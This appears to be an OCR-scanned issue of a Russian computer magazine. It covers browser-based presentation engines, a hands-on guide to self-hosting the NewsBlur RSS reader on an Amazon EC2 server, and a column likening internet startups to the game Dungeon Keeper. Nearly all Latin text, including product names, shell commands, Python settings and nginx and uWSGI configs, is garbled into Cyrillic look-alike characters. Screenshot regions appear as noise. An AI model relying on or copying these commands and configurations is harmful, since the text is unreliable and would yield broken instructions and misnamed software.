Первый доклад ваш покорный слуга прочитал в 2007 году 
на конференции РИТ, а сделал его в Ачобе Ши гаог: это 
был огромный документ 1600 на 7800 пикселей, который 
открывался несколько минут, нещадно тормозил и в итоге 
печатался в РОЕ Шизгаюг был, надо признаться, самым 
неудобным средством для создания презентаций, кото- 
рым я когда-либо пользовался. Возьмем скорбную паузу. 
Потом была попытка воспользоваться шаблонами 
РоммегРойт, от которых сводило зубы, недолгая интрижка 
с Кеупое (Арре ведь не может сделать плохо, так ведь?). 
И вконце концов я пришел к простой мысли: если я техно- 


логи рассказываю про технологии, про их огромную мощь 
и потенциал, то негоже мне использовать инструменты, 
противоречащие моим собственным идеям. 

В 2009 году сообщество «Веб-стандарты» провело 
в Минске первую конференцию \\еб З{ападага$ Вауз, на ко- 
торой я выступал с докладом про веб-шрифты, и работало 
это прямо из браузера. Попытка получилась успешной, 
хоть и работала эта презентация по системе Орега ЗПом,, 
понятное дело, только в браузере Орега. Прошло два года, 
прежде чем этот движок развился во что-то настолько ин- 
тересное, чтобы захотелось поделиться с другими, — уже 
под именем ЗПомег. 
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|МРВЕЗЗ.)$ 


прге$$.]$ (6 И.Гу/итрге$$_]$) — движокпрезентаций Бартека Шопкис ЗО-пролетами, 
развивающий подход Рге?! «поверхность с идеями» с помощью открытых техноло- 
гий прямо в браузере. 


еп уоц $Воц 4 {гу 


Шпрге$$.]$* 


* по путе имепаеа 


Презентация движка итрге$$.|$ Бартека Шопки начинается провокационно: вам демон- 
стрируют скучные белые слайды и задают вопрос «А не устали ли вы от однообразных 
презентаций?» — один слайд, второй, третий... и тут, при переходе на четвертый, все ме- 
няется. Вы оказываетесь на большой поверхности, где хитрым образом разбросаны все 
идеи, составляющие презентацию, и переход к следующей сопровождается замыслова- 
тым пролетом, от которого захватывает дух. 

Появившийся в 2011 году движок итрге5$.]5 развивает подход «поверхности с идеями» 
сервиса для создания презентаций Ргей! (рге71.сот) и соединяет ее с новыми доступны- 
=. В : ми в браузерах технологиями, используя анимацию и 3О)-возможности С$5, как геуеа!.}з. 
> - М>. е И если Рге7! — это коммерческий сервис на закрытой платформе Назп, то итрге$$.]$ — это 
о м бп с м открытая библиотека, работающая прямо в браузере без плагинов и тарифных планов. 


ШАБЛОНЫ б00СЕ 


Шаблон для боод!е /О (ЬИ.!у/доод!е-зПае$) — это корпоративный движок для пре- 

зентаций от Соое с тщательно проработанными стилями, отдельным окном < % 
для заметок докладчика. Он хорошо подходит для технических докладов. Его пре- 

дыдущая версия (5 \".1у/доое-зИаез-о!а) выглядит куда менее корпоративно. 


Если тебе до сих пор кажется, что презентации в браузере — это удел технологов-оди- 
ночек, которые состязаются друг с другом в энтузиазме и любви к новым технологиям, 
то ты ошибаешься. Технологи одной из крупнейших мировых корпораций Сооде, которая 
принесла в наши браузеры полноценный офис в виде Сооде Оос$, давно эксперименти- 
ровали с движками презентаций и использовали их для выступлений на конференциях 
Сооде Оеуеорег Вау и Сооде /О. 

Последней версией «корпоративного» движка Соое стал шаблон, подготовлен- 
ный для Сооде ИО 2012. Он позволяет использовать все мыслимые типы содержимого: 
от простого текста и фрагментов кода до сложных таблиц и пай-чартов. Можно даже вы- 
вести отдельное окно браузера на второй монитор и получить на нем заметки к слайдам 
и обзор текущего и следующего слайдов, прямо как во взрослых настольных системах. 


Те Сое$ Неге 
УрТо Тмю Ипе$ 


Соозе` (@) 


ЗНОМЕВ 


Зпомгег ($Пмг.те) — мой движок презентаций с режимом просмотра слайдов, стема- 
ми, отделенными от движка, и с широкой кроссбраузерностью. Название — это игра 
слов: на логотипе изображен душ, но «зПомгег» — это еще и «тот, кто показывает». 


В 2011 году на РИТе я выступил с докладом «Верстка со смыслом» и продемонстрировал 
публике новый движок презентаций Зпомег. Главной фишкой были два режима: один со 
списком слайдов, второй — презентационный. Такое разделение между движком и темой 
оформления позволяет легко изменить презентацию до неузнаваемости.. 

В комплекте с ЗПо\мег идут две темы ВЮБоп и ВИЗ, которые хотя и работают менее 
эффектно, чем пролеты итрге5$.]5, но создают условия, в которых сделать плохую пре- 
зентацию становится сложнее: текста на слайд помещается не много, он крупный и кон- 
трастный, картинки удобно вписываются во весь размер слайда. Кроссбраузерность 
здесь, в отличие от многих других движков, на высоте: в темах просто не используются 
возможности, которых нет в последних стабильных версиях популярных браузеров. 

Зпомег уже был замечен на конференции Егощеег$, в презентациях разработчиков 

Яндекса, Одноклассников, Злых Марсиан и многих других. Но настоящим признанием 
пиво = для меня как автора стало выступление Хокона Виума Ли, автора Орега ЗПом,, на конфе- 
ренции ЗХЗ\М/ 2012: Хокон использовал ЗПомег для своего доклада. 


Бриан бин ыбй зынытыья Нрытье-иртн 


АА 


В Википедии есть даже целая 
статья (БИ.1улм$$-мик!) \Меб- 
разед $Иезпом с обзором 
всех систем презентации, 
работающих в браузере. От- 
дельного внимания заслужи- 
вает статья Луиса Лазариса 
(БИ.1УЛатаг!$) и обзор пяти 
лучших систем НТМЕ- 
презентаций на ЗЦеРот{ 


(БИ.1у/5-Бе$1-\5$). 


Монструозные офисные пакеты не сдают свои позиции, но отчетливо видно, 
что растет популярность браузерных презентаций, особенно для техниче- 
ских докладов. 

Современные технологии, легкость настройки таких движков под свои 
нужды, независимость от платформы и принципиально новые подходы кде- 
монстрации делают браузерные презентации центром появления свежих 
идей, которые, возможно, найдут свое место и втрадиционных программах. 


ЗАКЛЮЧЕНИЕ 


И если ты не окончательно заменеджерел и у тебя есть интерес к тому, 
чтобы разобраться в веб-технологиях, экспериментировать и пробовать 
что-то новое, то не упусти возможность попробовать браузерные презента- 
ции. Алучше напиши свой собственный движок — на зависть всему миру. == 


Работа над ошибками 


Поднимаем альтернативу Соод[е Веадег 


Совсем недавно «корпорация добра» (а добра ли?) Сооде надумала закрыть так 

любимый гиками @ооде Веааег. К сожалению, на данный момент очевидного ре- © 
шения для миграции нет — у всех вариантов есть и плюсы и минусы. Более того, 

практически все альтернативные А$$-ридеры либо сильно уступают в функцио- 
нальности оригиналу, либо имеют некоторые проблемы с внешним видом. 


У 


Михаил Еловских 


РС2ОМЕ 
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итуация действительно сложная. Н$$ — отличная 
технология, позволяющая потреблять огромное ко- 
личество информации, и заменить ее пока никому 
не удается. Ведь как работают социальные сети? 
Ты входишь и пролистываешь два-три экрана (максимум) об- 
новлений, выискивая что-то интересное. Ни индикатора про- 
чтения, ни количества новых материалов в интерфейсе нет. 
И когда ты войдешь в следующий раз, ты начнешь не там, где 
закончил, — ты снова окажешься в потоке текущих новостей. 
И если у тебя есть какое-нибудь сообщество любителей, ска- 
жем, протокола Сорпег, то новости этого сообщества ты смо- 
жешь увидеть либо случайно, либо зайдя специально в их ак- 
каунт. Итак, что же делать теперь, когда Сооде Веааег вот-вот 
закроется? 

Вариант первый, самый наивный, — подождать, что боод!е 
одумается. Но даже если корпорация решится пойти навстре- 
чу не самой массовой (хотя и самой громкой) аудитории, 
нет никакой гарантии, что история не повторится через год. 
В общем-то, главная мораль во всем этом: если бооде Веаадег 
такой важный рабочий инструмент для тебя, то почему ты по- 
лагаешься на бесплатный сервис? 

Второй вариант — переходить на десктопное приложение. 
Очевидно, тут сразу теряется синхронизация списка источни- 
ков и прочтенного. Да и веб-приложение удобней в том плане, 
что тебе не нужно ничего устанавливать или обновлять. 

Третий вариант — перенести данные в какой-нибудь другой 
аналог ридера, которые как грибы после дождя полезли с мо- 
мента объявления о закрытии. Тут, в принципе, все выглядит 
неплохо, кроме одного «но»: практически все эти аналоги — не- 
большие стартапы, которые могут закрыться уже через полго- 
да. И тогда мы возвращаемся к началу статьи, только вместо 
Сооде Веааег подставляем название другого веб-приложения. 

Четвертый вариант — развернуть свою независимую вер- 
сию веб-приложения. Разумеется, возможность написать 
с нуля такую сложную вещь, как Н$$-ридер, мы пока рассма- 
тривать не будем, слава богу, быстрый поиск по гитхабу с лег- 
костью выдает десяток самописных альтернатив. Этот вариант 
подкупает еще и тем, что в этом случае ты сам себе хозяин: 
не нравятся особенности работы — их можно легко попра- 
вить/настроить, а если автор закроет проект — на работоспо- 
собности твоей реплики это никак не отразится. 

Среди четырех вариантов последние два выглядят наибо- 
лее привлекательно. А что, если бы существовал такой про- 
ект, который подпадал сразу же под две категории? Если бы 
он был отдельным веб-приложением, но при этом исходники 
были бы открыты и каждый желающий мог бы развернуть соб- 
ственную копию? И если бы это было функциональное при- 
ложение, не уступающее ридеру Гугла, с приятым внешним 
видом? Звучит несколько утопично, но, как ни странно, такой 
проект существует, и называется он Мем5Виг (пем5Биг.сотй). 
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Цоад Вавпсогз 2опе: ревиь ЗесигИу Сгоырв: 
о ЕВЕ, 32 диАЗЧеигсН - 1. уем ге 
‹ Зе: 
Туре Клис® гипя го 
А уу “па А Римасу Року — Теги ой Цве Реедьаск 


Собственно, все сказанное применимо к МемзВ!иг — это 
коммерческий проект с открытым исходным кодом, то есть, 
значит, автор заинтересован в постоянном развитии А$$- 
ридера, а также есть некоторая страховка от внезапного закры- 
тия. Итак, давай возьмемся за поднятие МемзВ иг в облаке. 


А\М/$ 

В качестве места дислокации можно выбрать практически лю- 
бой \0$. МемзВ иг написан на джанге (популярный фреймворк 
для питона) и использует МУЗОЁ или РоЗогез ОЕ для хране- 
ния данных, а также МопдорВ и Вед! для обработки фидов. 
Для статьи я выбрал бесплатный микроинстанс ЕС2 в Атагоп 
\Меб $егмсе$, который дают сроком на один год. Его возмож- 
ностей для наших целей хватит за глаза. 

Итак, зайдем в интерфейс АМ/$ и создадим новый инстанс. 
Для этого в разделе ЕС2/т$апсез нажмем кнопку «ЁГаипсй 
пзапсе». В появившемся диалоговом окне выберем режим 
Са$$с \М/хага и сконфигурируем нашу виртуалку. Первым ша- 
гом выбираем образ ОС, мне приглянулся образ Убити Зегуег 
12.10, но процесс установки, в принципе, аналогичен и под дру- 
гой операционкой. На следующем шаге выберем тип инстанса 
(Т1 Мсго). Еще несколько шагов позволяют внести различные 
параметры инстанса. Если ты еще не загрузил свой публич- 
ный ключ в А\/\/5, с которым ты сможешь заходить на виртуалку, 
то это нужно будет сделать на очередном шаге мастера. После 
этого нажмем кнопку «Ёаипсй», и в списке инстансов появится 
наша свежесозданная виртуалка. 


ПЕРВОНАЧАЛЬНАЯ НАСТРОЙКА 

Вообще, в МемзВ!г есть так называемый Таб-файл — спе- 
циальный скрипт, написанный на питоне с использованием 
библиотеки Табмс, который выполняется из локальной консо- 
ли и в теории должен в автоматическом режиме выкатывать 
код на сервер. Он находится в корневой директории проек- 
та (Таб\е.ру). Но к сожалению, в этом файле много, на мой 
взгляд, лишних деталей, делающих установку неоптимальной 
(скрипт, например, зачем-то ставит 7$Н на сервер). Поэто- 
му дальнейшую установку мы проведем вручную с оглядкой 
на таб -файл. 


В интерфейсе АМ$ выберем нашу виртуалку и скопируем 
домен, который ей назначен амазоном, вида: ес2-ХХ-ХХ-ХХ-ХХ. 
сотрще-1.атахопам/.сот (в дальнейшем — [ам/5-ес?]). И зай- 
дем нанее по 5$Н. 


$ эй [ам$-ес2] 


Сперва обновим систему 


$ зидо арЕ-веф ирда*е 
$ зидо арЕ-веф ирягаае 
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Поставим общие зависимости, не требующие настройки. 
Их можно найти и в таб\е.ру в функции зетир_тза1$. 


$ зидо арЕ-веф 1п$5%а11 116псиг5е$5 -дем 


Следом идут менеджер пакетов питона и де\у-сборка 
для компиляции отдельных пакетов типа |хт| или 1сопу. 


$ зи4ао ар*-веф руЕПоп-р1р руПоп-аеу 


Для |хт! необходимы следующие зависимости: 


$ зи4ао ар*-веф 1п$%а11 116хт12-4еу 116х$1{1-ае\у 


Поставим гит и скачаем исходники МемВг’а с гитхаба: 


$ зидо арЕ-веф 1п$5%а11 21% 

$ 21% с1опе в1*: //=1ЕНиЬ. сот/ затие1с1ау/+= 
Мем$В1иг.21& пем$Ь1Тиг 

$ са пем$ЬТиг 


НАСТРОЙКА ОКРУЖЕНИЯ ПИТОНА 

Теперь займемся установкой и настройкой питоньего окру- 
жения. Нам понадобится модуль ущиаепу позволяющий 
с легкостью управлять установленными питоньими пакетами. 
Для ущиаепу есть также пакет-обертка, несколько упрощаю- 
щий работу с ней. Поставим и его. 


5идо р1р 1п$%а11 у1гфиа1епуигаррег \м1гиа1епу 


еспо ". /ч5г/1оса1/61п/\1гЕча1епумгаррег. И" «= 
>> -/.БазИгс 
</.БазИгс 


ик\1гЕца]1епуи пем$Б1иг 


5 6 5 6 


В виртуальную среду оно зайдет автоматом, но надо учесть, 
что зайти потом можно будет через 


$ могкКоп пем$БТиг 


Также можно для удобства добавить в роасйуае-скрипт 
для автоматического захода в нужную папку: 


$ есйо "са -/пем$Б1иг" > ->/.м1гЕца1Тепу$ / пем$Б1иг/ += 
61п/розфасЕ1уате 


В файле гедигетещёАж находится список питоньих паке- 
тов, необходимых для работы приложению. Поставим и их: 


$ р1р 1п5а11 -г сопйяё/геди1гетете$. Ех 


НАСТРОЙКА БАЗ ДАННЫХ 
Как я писал ранее, можно выбрать либо МУЗСЕ, либо Ро$оге$. 
Мне больше нравится второй вариант. Поставим постгрес и за- 
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аенме ИУ Сгоыр заебе9 
& ЗесигИу Сгоир: чисКаипсв-1 за в = 
сеха!$ тибоциа 
Сгеаме а Сизлот ТОР ТСР 
пем гше: Рой {5егуке) Зоитса АсНоп 
Рогх гапае: 22 (55Н) 0.0.0.0/0 Ое!езе 
{е.5., ВО ог 49152-65535) 80 (НТТР) 0.0.0.020 бе|ете 
боитгсе: 0.0.0.00 8000 0.0.0.070 Бес 
(=.9., 192.168.2.0/24, 59-4724482е, ог 
123456789 0/деНки) 
|Ф ^44 Вы! 
[Арруу Вью Снагурю 
Настройка файрвола $ зи4ао ар*-веф 1п$%а11 ро5{вге$а1 ‹- 


Успешно запущенное 


висимости, чтобы собрать рр-пакет: приложение 
вое Ор мемиые ь м 
+ — С 1 «2-50-17-15-7охпрлие- 1 ципадотами сот тт. #@ № № = 


МЕВ РАС & |РНОМЕ 


Мем/5Вмг 15 а регзопа| пе\муз 


геадег 


Била йтия резсере омде Рег с Ба] аБьсное Ее мис 


АУТ ТНЕМ 


$ Яап ир ог Год т 


© Ту ош МемизВыг | 


Е тие пинйтшв _ ро мыша оо ваний 
Бывалый лаатвныя швы [ ни, ый 
ВЕЕРА о: = ешь та 
ии етики италии = ПОВИИЕЯ паныц ал 
тега еек Вазый ВЯ але гавани пит наанив менее ви атонанна р ой 
=. ть в НОЖИ ненниние  знени 
с нае. о аа == = ————.-— паче 
ЯВ. ЧЕРРИ. ноша падасы Г И, аль а Иа В. ео Рабат ь ща ЕЕ 


ро52ге5а1-зегуег-4еу-9.1 
$ р1р 1п5а11 рзусоре2 


Создадим базу для приложения и пользователя приложе- 
НИЯ. 


$ зидо -и роз+2гез рза1 +етр1а%е1 

фетр1афе1=# СКЕАТЕ Ц$ЕК пем$61иг МТТН РАЗЗМОВО «= 
'р@$зм@га'; 

фетр1афе1=# СКЕАТЕ ОБАТАВАЗЕ пем$Б1Тиг; 
фетр]1а*е1=# СКАМТ АЁЕЕ РКТУТЕЕСЕ$ ОМ БАТАВАЗЕ «= 
пем$61иг фо пем$Ь1Тик; 

фетр]1ае1=# \а 


Проверим, что работает. Для этого зайдем в консоль. 


$ р$91 -а пемзБ1иг -Ц пем$61иг -П 1оса1по$* -и 


Установка МопдоВВ и Веа!5: 


$ зидо арЕ-вее 1п$%а11 топвоаб ге1$-зегуег 


В нашем случае оба хранилища поставляются с достаточ- 
ным дефолтным конфигом, поэтому особых настроек над ними 
делать не будем. 


НАСТРОЙКА ПРИЛОЖЕНИЯ 

Вот мы и добрались наконец до настройки самого приложения. 
Перейдем в папку с ним и сделаем копию файла |оса! зе йптод$з. 
ру из шаблона. Там будут основные настройки нашего приложе- 
ния. Файл |оса!_зе{та$.ру уже добавлен в .дШопоге, поэтому, 
с одной стороны, при обновлении кода волноваться за измене- 
ния внем не будет нужно. С другой стороны, нужно будет перио- 
дически просматривать шаблон на предмет появления каких-то 
новых особенностей. 


$ са -/пем$61иг/ 
$ ср 1оса1_зе*1п8$.ру.етр1афе 1оса1_зе{1пв$.ру 
$ м1т 1оса1_ зе 1п8$.ру 


Открываем файл локальных настроек на редактирование 
и вносим следующие изменения. Вносим свои емейлы вместо 
авторских. 

Переменной ЗЕСВЕТ_КЕУ задаем какое-нибудь хитрое не- 
повторимое значение знаков из 50. Она будет использоваться 
в ряде встроенных в джангу криптографических функций. 

Прописываем реквизиты доступа к постгресу: 


РАТАВАЗЕ$ = { 
'аеРач1*': { 


'МАМЕ': ‘пемз$б61иг', 

'ЕМСТМЕ': 'Ч)апзо.аАБ.БасКепа$ . <= 
ро${#геза1_рзусор52', 

'И5ЕВ": 'пем$ЬТиг', 

'РАЗЗИОКО" : "р@$55м@га’, 

'НОЗТ": "127,0.0.1', 


}, 


Остальными рычагами можно поиграться уже на свое усмо- 
трение. 
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Все, пробуем выполнить в консоли: 


$ ./тапаёе.ру $хпе11 


Если все запустилось без ошибок — хороший признак, ско- 
рее всего, явных больших ошибок в конфигурации нет. 
Теперь создадим структуру таблиц в БД командой: 


$ ./тапаге.ру зупсаб --а11 


В процессе выполнения команды на вопрос: «\ои ]и$ 
ша!еа Бапдо’$ ашй эзучет, миюсп теап$ уои оп“ пауе апу 
зирегизег$ аейптеч. М/оц9 уоиц ПКе то сгезе опе пом/? (уез/по):» 
ответим «да» и создадим суперпользователя для админки. 

Так как все таблицы были созданы по последнему слепку — 
вернем поддержку миграций (чтобы в будущем иметь возмож- 
ность обновлять наше приложение). 


$ ./тапаёе.ру м1егафе --РакКе 


Поскольку АМ по умолчанию файрволом закрывает все 
порты на виртуальной машине, кроме 22-го, — зайдем в веб- 
интерфейс амазона в раздел МЕТМОНК & ЗЕСУВПУ -› Зесийу 
Огоирз, там найдем группу нашей виртуалки и добавим в спи- 
сок разрешенных портов 80 и 8000 для сети 0.0.0.0/0. 


Запустим рансервер и зайдем на нашу машинку: 


$ ./тапаёе.ру гипзегуег 90.0.0.0:8000 


И в браузере наберем П{р://[ам$-ес2]:8000/. Если все на- 
строено верно, то мы увидим заглавную страницу нашей копии 
А$$-ридера. 


НАСТРОЙКА ВЕБ-СЕРВЕРА 

Итак, мы настроили веб-приложение, и оно работает. Осталось 
еще два шага: настроить сервер приложений (можно выбрать 
любой \/5С!-совместимый, но мне привычней и\/\/5С!), который 
будет следить за работающей копией приложения, и прикрыть 
его быстрым и легким потх’ом, который будет раздавать стати- 
ку и проксировать запросы для сервера приложений. 


$ зи4ао ар*-веф 1п${а11 им$81 пе1пх += 
и\!5 51 -р1и51п-руПоп 


Расскажем и\\/5С!-серверу о нашем приложении: 


$ са /еёс/чм$21/арр$-ауа11аб1е/ 
$ зидо м1т пем$Б1иг. 111 


[чм$21 ] 
<оске{ = 127.0.0.1:9000 
У1гЕца]1еп,у = /Воте/ибипи/ .утгЕцча1епу$ /пем$ БТ иг 


эоо База вбане Сите ах | 
= С 62 -50=17=15= 7 сопириое = 1 зла ами сон: 000 
ОааБазеЕггог а{ / 


геабоп "Фапоо_вИе" доез по! ех! _ ро 
ЫМЕ 1: ..."Чапдо_эКе"."дотап", "Фапдо_эКе"."пате" РАОМ "апдо_51... 
й 


Аециенй Мен о: ОЕТ 

Весны ОРС: НИроиЛьс 2-50-17: 15- 72. сопроа- 1. влиаьенаны сент: ВСОСУ 
Сала Магуол: 1,5 
ЕхоерН от Туре: СаБабаниоЕ тс 


Ехеврийснь Майза: иета 151 "азаою вата" поза пое выфаь 
ИЕ 11... МЗавто вре”, “фота д”, Зато _вфьн”. “паки” РАОН “ШЗапую_вй... 


Ш 


Ехсерноп Госанол: Изотооибыгии антигенов руно. УЛ-рас карниз рсноиувьой_роусороз/ьеие,руу 


вхесые, те 54 
Рус В косая а: ПобетньИо ни гаш неон Бо ви рии ЕРОСИА 
Руот Уют: 2.7.9 
Рувол Рав: [ ТАТА 


"ИБЕРИИ «УЕ ЕВ Пе Еее рУВов О, Иво река Иво ртс1н-0,611 ру. 7.90". 
* Гы вае Гоблина рав рев ще оса 1 Е руспют а. Габи = раса Гр р=1. 1. 1 =ру2. 7.090: 


то ГЫ ВтАИ „та еииа гиее а Грусюе 1.7", 
Е 

рва НЫЙ - ме а ели Иена ше Вр неа. ТУЛЕЬеЬК ', 

ТЫ уе кыа вена паевые ть Груенавя 116-81", 

| Баев И АЛЬ а с ол Ве в гены Зе и БИ ру Сорт „У - Фуа аы ', 

"Рае ыИруквове. 7, 

ишииГТЬГруквотя, Ира 11 пана', 

"аки руно. УЛ ШЬнАК", 

Ио Гош «ска ея бы оса 1 ИВ Рруеваи я, За а -раскасей*, 

| Ба Гоби и ла Планы ны 7 неа ИЕ "руна , ТИ раекауеа ГР ", 


В случае ошибки О]апдо 
выдастподробное со- 
общение оее причине 
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сНа1г=/Воте/ибипи/пем$Б1иг 

епу = ОЗАМСО_5ЕТТТМ65 _МОБУЕЕ=5е*{1п55 

то4и1е = а]апго. соге.Напа1ег$ .м$581 : М5бТНапа1ег() 
уасиит=Тгие 

тах -гедие{$=5000 

1020 = /маг/108/им$51 /пемБ1иг. 108 


$ са ../аррз-епаб1еа/ 
$ зидо 1п -$ ../арр$-ауа11аб1е/пем$Ь1иг. 111 
$ зи4о зегу1се им$=1 гезфаге 


И расскажем патх’у о нашем сайте: 


$ са /ежс/пё1пх/$1%е5-ауа11аБ1е/ 
$ зиао \у1т пем$Б1иг 


зегуег { 
115{еп 80; 
зегуег_пате фНозпате; 
ассе$_1о08 /маг/105/пё1пх/= 
пем$61иг_ассе$$5.105; 
еггог_105 /\маг/105/п51пх/-= 
пем$61иг_еггог.105; 


Тоса1оп / { 
4551 _ра$$ 127.0.0.1:9000; 
1ис1иде (\/581_рагат$; 
им581_ рагат Ц\М$СТ_$СНЕМЕ $5сйВепте; 
им$21 _рагат ЗЕВ\УЕВ_ЗОЕТМАВЕ <= 
п21пх/$п81пх_мег$1оп; 


} 


Тоса1оп /тей1а { 
ГОО /поте/иБипфи/пем$Ь1иг; 
1паех 1паех.Н%т1 1паех.Н*пт; 


} 


$ са ../51е$-епаб1Теа/ 
$ зиао 1п -$ ../51е$-ауа11аб1е/пем$ 61 иг 


$ эи4о зегу1се пё1пх гезфагЕ 


После этого можно вернуться в браузер и посмотреть наш 
ридер по его адресу, но уже на 80-м порту. 


ОБНОВЛЕНИЕ 

Остался еще один момент, который требует внимания, — это 
обновление. Автор ньюсблура пушит по несколько коммитов 
в день и периодически мержит пулл-реквесты. Разумеется, 
в случае изменения каких-либо особенностей работы, появ- 
ления новых настроек и тому подобного необходимо будет 
вручную разруливать возникающие при обновлении конфлик- 
ты. Но в общем случае порядок действий примерно следую- 
щий: 


$ са -/пем$61Тиг 

$ 21 ри11 

$ ./тапаёе.ру м1ега*же 

$ зидо зегу1се им$81 геТоаа 


ЗАКЛЮЧЕНИЕ 

Во всем этом есть болышое, жирное «но». У Мем5В иг есть мо- 
бильные клиенты, но настроить их на собственный бэкенд 
нельзя. Я сознательно решился на такой компромисс. Если бы 
я выбрал Тту[Н$$, то пришлось бы иметь дело с довольно мед- 
ленным и страшненьким интерфейсом (хотя к моменту сдачи 
материала в печать работа над проектом заметно активизирова- 
лась). Да и клиент нормальный есть только под Апагою. Если бы 
я выбрал Реуег, то пришлось бы отдать 30 баксов, а клиент есть 
только под 0$ (хотя под Апаго@ есть неофициальный Ме Као\м/п). 
В этом смысле я решил поставить на наиболее удобный проект 
с открытым исходным кодом, у которого с большой вероятно- 
стью соберется «правильная» аудитория. Ведь кроме самого 
веб-приложения автор также открыл исходники мобильных при- 
ложений для 10$ и Апаго. Поэтому думаю, что появление нор- 
мальных клиентов для Мем/5Виг — вопрос времени. В конечном 


= 


счете, нажать кнопочку «Рогк» можешь и ты сам, не так ли? == 
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Кеерег 


СЦЕНА 


игра в 90-е: ты управлял подземельем, устраивал ус- 

ловия быта, а ктебе через портал приходили разного 
рода монстры — спать, есть, читать книжки и тренироваться. 
Чем лучше были условия жизни, тем более душевные и про- 
двинутые монстры заходили на огонек. 

И еще там был рогатый потрошитель. Он в одиночку мог 
отработать за половину твоей армии. Но при этом был по- 
стоянно недоволен и от безделья наносил увечья своей же 
команде. 

Жители мира над подземельем (в основном все в белом, 
рыцари в блестящих доспехах, красивые феи с прозрачны- 
ми крылышками и добрые волшебники) очень переживали, 
что где-то под ними развивается маленькая империя зла. 


аткнулся тут на описание игры ОБипдеоп Кеерег 
ы на Лурке (игктоге 4о/Випаеоп_Кеерег). Была такая 


Переживали и приходили к тебе экспортировать добро и де- 
мократию. В смысле, приходили мочить. 

Нельзя было добиться того, чтобы под твое начало по- 
ступали только хорошие и мотивированные монстры. Можно 
было только построить красивое подземелье, организовать 
хорошие условия и надеяться, что они привлекут к тебе пра- 
вильную команду. Наиболее крутые монстры приходили неча- 
сто и очень случайно. И если твое подземелье было фиговым 
и/или ты им неверно управлял, то они обижались и уходили 
в свой портал обратно. 

Кто хочет вспомнить еще подробнее — читайте либо пол- 
ный текст на Лурке, либо Википедию (6 и.1у/ОКмик). 

Так вот, Випдеоп Кеерег и его подземелье очень похожи 
на то, как развиваются новые интернет-компании. А-леведе- 
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ВОТ НЕСКОЛЬКО АНАЛОГИЙ 


Монстры тоже должны получать удовольствие. У каждого свой 
индивидуальный характер и десяток поводов на тебя обидеться. 
Реально сложные уровни нельзя было пройти, если ты не разобрался 
в неординарности и переживаниях отдельно взятого монстра. Каждый 
толстый демон грустил по-своему. Кто-то голодный. Кто-то не рад, 
что рядом с ним в логове поселили паука или гигантскую муху. Кому-то 
обязательно нужна своя камера пыток и пара пленных для тестирования 
ее оборудования. Кому-то — тишина, библиотека и личный храм. 

Конечно, можно было управлять подземельем — как и интернет- 
компанией — как фабрикой чернорабочих. Постоянно подстегивать 
свою команду делать то, что им не нравится. Некоторые интернет-ком- 
пании, к сожалению, так и работают — ты, вероятно, сам знаешь какие. 
Но при таком подходе игра быстро переставала быть интересной. 


Подземелью не подходит микроменеджмент. В Бипдеоп Кеерег 
нельзя обойтись без доверия к команде. Она сделает большую 
часть работы сама — только организуй условия и правильное яитание 
управление. 

Главный инструмент контроля в игре — «рука Зла», которой можно 
было схватить своего монстра за шкирку и швырнуть на любую твою 
территорию. Где он, наверное, займется тем, что ты от него хочешь. Или 
не займется. Например, расстроится, что ты не дал дочитать книжку, 
и уйдет обратно в библиотеку. Прямо с поля боя. 

Гораздо более эффективная стратегия — научиться предсказывать, 
чем монстр будет готов заняться в нужный тебе момент времени. Тог- 
да управление игрой становилось похожим на квест, в котором только 
и надо, что вовремя выбирать правильные ответы. 


Пока ты выполняешь работу за одного конкретного монстра, твое 
подземелье разваливается. В ОГипдеоп Кеерег была уникальная 
фича — можно было вселиться в любого из своих монстров и поиграть 
от первого лица. Подраться, потренироваться, помочь в строительстве 
подземелья. Квалифицированно чужую работу выполнить было почти 
невозможно — только развлечься. Более того, такие развлечения ни- 
когда не приводили к победе и заканчивались одним и тем же: ты упу- 
скал общую картину из виду, и, пока ты решал за своего подопечного 
узкоспециализированную задачу, твое подземелье грабили. 


Все, кто кажутся добрыми, на самом деле хотят тебя замочить. 
Оипдеоп Кеерег стал первой известной игрой, где силы добра не вели 
себя по-доброму. Успешное подземелье раздражало нарядных рыца- 
рей — так же, как и успешные маленькие команды раздражают крупные 
компании. Если у дверей в твое подземелье появлялись добрые вол- 
шебники, это было первым сигналом тревоги: надо срочно строить ло- 
вушки и тренировать силы для обороны. 

У светлых сил были неограниченные ресурсы для уничтожения под- 
земелья, а противопоставить им можно было только скорость твоего 
роста. 


Игру нельзя выиграть, если играть осторожно. Времени копить 
деньги в Бипдеоп Кеерег не было. Постоянно надо было идти на «кас- 
совые разрывы» и жертвовать идеальной стратегией в пользу скорости. 
Недостаток ресурсов приводил к типичному для стартапов «протодак- 
шну» — недотренированные воины отправлялись в серьезный бой, 
а пушки для защиты твоего подземелья обычно строились уже в тот мо- 
мент, когда ктебе приходила вражеская армия. 

Можно было построить милое, уютное и очень маленькое подземе- 
лье, огороженное непробиваемыми стенами со всех сторон. Но такое 
подземелье переставало быть интересным не только твоим врагам, 
но и твоей команде. 


Аналогий наверняка было больше — но это не та тема, где стоит 
гнаться за академической точностью. Уверен в одном — несколько под- 
росших игроков в Випдеоп Кеерег сейчас руководят отличными интер- 
нет-командами. 

И о самом Випдеопт Кеерег. Игра создавалась огромной компани- 
ей — Нестопюс Ап$, которая в начале 2000-х бросила идею как непри- 
оритетную и не выпустила обещанную третью часть. Группа любителей 
ОК — таких же, как автор этого текста, — объединилась в конце про- 
шлого года для выпуска продолжения. Поддержать инициативу можно 
на Кикстартере — даже если вы из России (Кск$ащег.сот/ргое$ 


зиЗеггапеапдаате$Лмаг-ог-{Пе-омегмо!а). 


Питер Молинье — первый архитектор ОК — уже поддержал. = 
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ПЕРО МАСТЕРА 


Кстати, сам Питер Молинье, проработав почти 
шесть лет в Мсго$ой, отправился делать уже тре- 
тью в своей жизни гейм-студию, 22сап$. Первой 
игрой стала Сипо$йу — мультиплеерный перфор- 
манс для мобильных устройств, в котором игро- 
кам предлагается постепенно снимать «слои» 
с одного общего куба. Когда все слои будут сняты, 
счастливчику, который вытащит последний эле- 
мент последнего слоя, «откроется нечто, что из- 
менит его жизнь». И что там будет, узнает только 
этот человек. 

Правильно, узнаём перо скромного мастера. 
Правда, из-за технических проблем у Сипозйу 
произошел отвратительный лонч, и команде при- 
шлось приносить извинения. Следующая его 
игра — Со4ди$ — делается уже в традиционном 
для Молинье стиле симулятора бога, и команде 
удалось собрать 800 тысяч долларов (при не- 
обходимых 685 тысячах) на КскЗацег. Правда, 
как и с большинством проектов Молинье, дата вы- 
хода не называется. 
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Х-МоБПе 


ТЕСТ-ДРАЙВ ОВУМТИ 
ТОУСН И НВЕРОХ 0$ 
